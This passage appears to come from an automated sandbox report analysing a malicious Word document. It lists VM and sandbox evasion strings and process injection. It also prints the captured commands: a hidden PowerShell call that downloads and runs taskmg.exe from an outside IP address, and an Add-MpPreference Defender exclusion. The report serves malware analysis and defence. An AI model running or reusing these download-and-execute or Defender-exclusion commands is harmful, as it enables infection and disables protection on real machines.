                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2860Thread sleep time: -30027s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1684Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 572Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1308Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 645
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 9120
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30027
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: taskmg.exe, 00000009.00000002.445135938.000000000058E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory written: C:\Users\user\AppData\Roaming\taskmg.exe base: 400000 value starts with: 4D5A
                    Adds a directory exclusion to Windows DefenderShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Injects files into Windows applicationShow sources
                    Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policyShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
